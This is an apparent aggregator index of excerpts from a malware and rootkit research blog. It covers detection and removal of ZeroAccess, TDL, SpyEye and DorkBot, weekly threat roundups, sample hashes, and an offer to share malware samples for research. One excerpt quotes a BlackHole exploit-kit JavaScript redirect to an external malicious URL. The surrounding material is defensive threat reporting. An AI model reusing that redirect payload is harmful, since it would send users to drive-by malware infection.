Quantcast
Channel: A blog about rootkits research and the Windows kernel
Browsing all 58 articles
Browse latest View live

Image may be NSFW.
Clik here to view.

TDL FS dumper's

Kaspersky tdsskiller http://support.kaspersky.com/downloads/utils/tdsskiller.exeESET tdlfsreader http://eset.ru/tools/TdlFsReader.exetdsskiller firstFirst, edit options"Checking TDL FS" to OnPerforming...

View Article


Image may be NSFW.
Clik here to view.

ZeroAccess detection with Xuetr tool

Xuetr is a powerfull tool for hide_code/rootkit detection (available for download from http://www.xuetr.com/download/XueTr.zip).Run it on machine that was infected of latest ZeroAccess rootkit.After we...

View Article


Image may be NSFW.
Clik here to view.

Necurs rootkit detection

Detailed information (and droppers too) available onhttp://www.kernelmode.info/forum/viewtopic.php?f=16&t=897http://www.kernelmode.info/forum/viewtopic.php?f=14&t=1177&p=8933#p8859Block...

View Article

Image may be NSFW.
Clik here to view.

New BlackHole features

I looked MDL today and suddenly discovered the following:New method of BlackHole spreading. js has the form:document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';ISC wrote about that...

View Article

Image may be NSFW.
Clik here to view.

Russian's election - hall of shame

1) In the day of election.Intermediate results:146,47 % - Special wrapping for pro-Kremlin party.2) DDos attacks on social networks and media, such as, St. Petersburg Novaya Gazeta, KartaNarusheniy.ru,...

View Article


Image may be NSFW.
Clik here to view.

SpyEye removing with Xuetr tool

SpyEye is a famous trojan that steals your private data.Also known as EyeStye (Microsoft), Pincav (Kaspersky).Can be identified by any anti-rootkit: only user-mode hooks, no driver.Purpose of hooks is...

View Article

Image may be NSFW.
Clik here to view.

DorkBot/NgrBot removing

Worm:Win32/Dorkbot.I - worm, based on IRC communication (DorkBot family) with a backdoor features.Also known as NgrBot, IRCBot.Like SpyEye may capture private user data, such as user names and...

View Article

Image may be NSFW.
Clik here to view.

Top threats at last two weeks (20 Dec '11 - 3 Jan '12)

20 Dec '11 - 3 Jan '12New wave of Sinowal/Mebroot spreads.Wave of French ransoms - Trojan Ransom.At start of first week - Winlock/WindowsSecurity.FakeRean (Rogue:Win32/FakeRean), covers: XP Antispyware...

View Article


Image may be NSFW.
Clik here to view.

Top threats of the week 3 Jan '12 - 7 Jan '12

3 Jan '12 - 7 Jan '12Sinowal/Mebroot.NgrBot/DorkBot/IRCBot.Caphaw.A - Backdoor.Password stealers (ZBot/SpyEye).Ramnit.Rogue: FakeRean, Winlock/Ransom, WindowsSecurity.Cridex.

View Article


Image may be NSFW.
Clik here to view.

BlackHole spreads more and more malware

Trend of the last weeks is a BlackHole and that it spreads a lot of types of malware. In fact it password stealers and ransomware with which attackers get the most profit.So, the most widespread BH...

View Article

Image may be NSFW.
Clik here to view.

Top threats of the month, Jan 2012

At first month of new 2012 year were observed, in general, a lot of various ransomware, fake antiviruses and passwords stealers. At first quarter of January there was new type of ransomware - Reveton....

View Article

Image may be NSFW.
Clik here to view.

New ZBot modifications

MD5: B52BD5D6B18A0A46FA062269BE3B639FSHA1: 104681a106148e47970ac6c31e83009640ed532bMD5: 376EC224F2931544E1A7C0703085B9DDSHA1: ed6a50d67e5e44e22c8950395f78102661a1a32eMD5:...

View Article

Image may be NSFW.
Clik here to view.

BlackHole spreads ZeroAccess/Sirefef

With Kafeine observed that BlackHole group that is distributed Carberp in past, now distribute ZeroAccess.All samples were with FUD status. Couple of hashes:MD5: 4f7c964fe7011de17ccbce326591586fSHA1:...

View Article


Image may be NSFW.
Clik here to view.

Комьюнити: Microsoft нарушила правила в деле ликвидации ZBot

Начало истории, вкратце:http://www.anti-malware.ru/forum/index.php?showtopic=21983Microsoft решила нанести удар (disrupt) по инфраструктуре ботнета, боты которого основаны на оригинальных кодах...

View Article

Image may be NSFW.
Clik here to view.

Malware collection and research

Guys, I collected malware at last few month. If you need information or MD5 or samples for research purposes, leave message at post or send message at my VT profile at...

View Article


Image may be NSFW.
Clik here to view.

Буткиты - тренд выживания малвари в современных условиях

Итак коротко, по сути и расставляя акценты в нужных местах.В начале обратимся к тому, что писал Symantec уже почти год назад. Статья называлась Are MBR Infections Back in Fashion? (Инфицирование MBR...

View Article

Image may be NSFW.
Clik here to view.

Flamer goes ITW

Original CrySys very detailed and useful research http://www.crysys.hu/skywiper/skywiper.pdf.CrySys report was updated with adding of Kaspersky info about mssecmgr.ocx structure.Steps to infection:...

View Article


Image may be NSFW.
Clik here to view.

ZeroAccess - new steps in evolution

Already since a month ago ZeroAccess was updated. As we remember in previous versions it contained rootkit with VFS functionality and also modern self-defence method from AV-scanners. Also it infected...

View Article

Image may be NSFW.
Clik here to view.

Removing Pushbot worm with your hands

Research belongs to fresh version of Pushbot worm - Worm:Win32/Pushbot.VR.Dropper:MD5: 3e50b76c0066c314d224f4fd4cbf14d5SHA1: 8284814c5c5cb0f37fe200b918b65ef89c259a0aInfects via facebook spreading...

View Article

Image may be NSFW.
Clik here to view.

Interesting malware of the month: trends and hashes

Interesting malware that already discussed at last month.1. ZeroAccess/Sirefef was updated. With feature of cross-platform file-infector and shellcode.SHA1: 23e1f3a819e4e4af58c4a6d5eb489b90ebd7ae8fMD5:...

View Article
Browsing all 58 articles
Browse latest View live